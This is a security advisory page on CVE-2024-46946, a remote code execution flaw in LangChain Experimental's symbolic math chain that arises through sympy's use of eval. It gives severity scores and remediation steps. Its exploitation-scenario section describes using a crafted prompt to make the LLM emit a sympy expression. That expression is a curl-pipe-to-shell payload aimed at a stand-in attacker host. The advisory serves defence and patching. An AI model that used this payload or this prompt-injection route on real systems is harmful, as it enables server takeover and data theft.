AI Threat Alert

CVE-2024-46946: LangChain-Experimental: RCE via eval in math chain

CRITICAL PoC AVAILABLE CISA: ATTEND
Published September 19, 2024
CISO Take

Any application using LangChain Experimental's LLMSymbolicMathChain is exposed to unauthenticated remote code execution — CVSS 9.8. A public exploit exists. Patch immediately to a version above 0.3.0 or disable this chain; there is no safe workaround if the chain is exposed to untrusted input.

What is the risk?

Severity is maximum: network-accessible, no authentication, no user interaction, public PoC available on GitHub. The vulnerability is trivial to exploit — sympy.sympify() internally calls eval() on user-influenced strings, meaning any attacker who can reach the endpoint can run arbitrary OS commands with the process's privileges. Exposure is broad because LangChain Experimental is widely adopted in AI agent prototypes and internal tools, many of which lack perimeter controls.

What systems are affected?

Package Ecosystem Vulnerable Range Patched
LangChain pip No patch
139.8K OpenSSF 5.9 2.7K dependents Pushed 2d ago 24% patched ~156d to patch Full package profile →

Do you use LangChain? You're affected.

How severe is it?

CVSS 3.1
9.8 / 10
EPSS
1.3%
chance of exploitation in 30 days
Higher than 68% of all CVEs
Source: EPSS v3 — FIRST.org
Exploitation Status
Exploit Available
Exploitation: MEDIUM
Sophistication
Trivial
Exploitation Confidence
medium
CISA SSVC: Public PoC
Public PoC indexed (trickest/cve)
Composite signal derived from CISA KEV, VulnCheck KEV, CISA SSVC, EPSS, Metasploit, Exploit-DB, trickest/cve, Nuclei templates, and inthewild.io exploitation reports.

What is the attack surface?

AV AC PR UI S C I A
AV Network
AC Low
PR None
UI None
S Unchanged
C High
I High
A High

What should I do?

6 steps

  1. PATCH

    Upgrade langchain-experimental to a version above 0.3.0 immediately.

  2. AUDIT

    Inventory all applications importing LLMSymbolicMathChain — grep codebase for 'LLMSymbolicMathChain' and 'langchain_experimental'.

  3. DISABLE

    If upgrade is not immediately possible, remove or disable LLMSymbolicMathChain from all agent configurations.

  4. ISOLATE

    Run LangChain services in sandboxed environments (containers with minimal OS capabilities, no outbound internet, drop capabilities).

  5. DETECT

    Alert on unexpected subprocess spawns, outbound connections, or file system writes from LangChain process PIDs.

  6. VERIFY

    Confirm remediation by checking installed package version: pip show langchain-experimental.

What does CISA's SSVC say?

Decision Attend
Exploitation poc
Automatable Yes
Technical Impact total

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

How is it classified?

Code Execution Supply Chain Framework Agent AML.T0010.001 AML.T0049 AML.T0050 AML.T0072

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act
Article 9 - Risk Management System
ISO 42001
9.1 - Monitoring, Measurement, Analysis and Evaluation
NIST AI RMF
MS-2.5 - Testing, Evaluation, Validation and Verification
OWASP LLM Top 10
LLM02 - Insecure Output Handling

Frequently Asked Questions

What is CVE-2024-46946?

Any application using LangChain Experimental's LLMSymbolicMathChain is exposed to unauthenticated remote code execution — CVSS 9.8. A public exploit exists. Patch immediately to a version above 0.3.0 or disable this chain; there is no safe workaround if the chain is exposed to untrusted input.

Is CVE-2024-46946 actively exploited?

Proof-of-concept exploit code is publicly available for CVE-2024-46946, increasing the risk of exploitation.

How to fix CVE-2024-46946?

1. PATCH: Upgrade langchain-experimental to a version above 0.3.0 immediately. 2. AUDIT: Inventory all applications importing LLMSymbolicMathChain — grep codebase for 'LLMSymbolicMathChain' and 'langchain_experimental'. 3. DISABLE: If upgrade is not immediately possible, remove or disable LLMSymbolicMathChain from all agent configurations. 4. ISOLATE: Run LangChain services in sandboxed environments (containers with minimal OS capabilities, no outbound internet, drop capabilities). 5. DETECT: Alert on unexpected subprocess spawns, outbound connections, or file system writes from LangChain process PIDs. 6. VERIFY: Confirm remediation by checking installed package version: pip show langchain-experimental.

What systems are affected by CVE-2024-46946?

This vulnerability affects the following AI/ML architecture patterns: agent frameworks, LangChain pipelines, math reasoning chains, LLM-powered API backends, internal AI tooling.

What is the CVSS score for CVE-2024-46946?

CVE-2024-46946 has a CVSS v3.1 base score of 9.8 (CRITICAL). The EPSS exploitation probability is 1.35%.

What is the AI security impact?

Affected AI Architectures

agent frameworksLangChain pipelinesmath reasoning chainsLLM-powered API backendsinternal AI tooling

MITRE ATLAS Techniques

AML.T0010.001 AI Software
AML.T0049 Exploit Public-Facing Application
AML.T0050 Command and Scripting Interpreter
AML.T0072 Reverse Shell

Compliance Controls Affected

EU AI Act: Article 9
ISO 42001: 9.1
NIST AI RMF: MS-2.5
OWASP LLM Top 10: LLM02

What are the technical details?

Original Advisory

langchain_experimental (aka LangChain Experimental) 0.1.17 through 0.3.0 for LangChain allows attackers to execute arbitrary code through sympy.sympify (which uses eval) in LLMSymbolicMathChain. LLMSymbolicMathChain was introduced in fcccde406dd9e9b05fc9babcbeb9ff527b0ec0c6 (2023-10-05).

Exploitation Scenario

An attacker targets a public-facing AI chatbot or internal math-reasoning API built with LangChain. They craft a prompt that causes the LLM to output a valid-looking but malicious sympy expression such as '__import__("os").system("curl attacker.com/shell.sh|sh")'. LLMSymbolicMathChain passes this string to sympy.sympify(), which internally calls eval(), executing the payload with the server process's privileges. No credentials or special knowledge required — the public PoC confirms this is script-kiddie territory. A successful exploit yields full server compromise, data exfiltration, or lateral movement into the AI infrastructure.

Weaknesses (CWE)

CWE-20 Improper Input Validation

CWE-20 — Improper Input Validation: The product receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly.

  • [Architecture and Design] Consider using language-theoretic security (LangSec) techniques that characterize inputs using a formal language and build "recognizers" for that language. This effectively requires parsing to be a distinct layer that effectively enforces a boundary between raw input and internal data representations, instead of allowing parser code to be scattered throughout the program, where it could be subject to errors or inconsistencies that create weaknesses. [REF-1109] [REF-1110] [REF-1111]
  • [Architecture and Design] Use an input validation framework such as Struts or the OWASP ESAPI Validation API. Note that using a framework does not automatically address all input validation problems; be mindful of weaknesses that could arise from misusing the framework itself (CWE-1173).

Source: MITRE CWE corpus.

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

References

Timeline

Published
September 19, 2024
Last Modified
July 16, 2025
First Seen
September 19, 2024

Related Vulnerabilities

CRITICAL CVE-2025-2828 10.0

LangChain RequestsToolkit: SSRF exposes cloud metadata

Same package: langchain
CRITICAL CVE-2023-34541 9.8

LangChain: RCE via unsafe load_prompt deserialization

Same package: langchain
CRITICAL CVE-2023-29374 9.8

LangChain: RCE via prompt injection in LLMMathChain

Same package: langchain
CRITICAL CVE-2023-34540 9.8

LangChain: RCE via JiraAPIWrapper crafted input

Same package: langchain
CRITICAL CVE-2023-36258 9.8

LangChain: unauthenticated RCE via code injection

Same package: langchain
Back to Threat Feed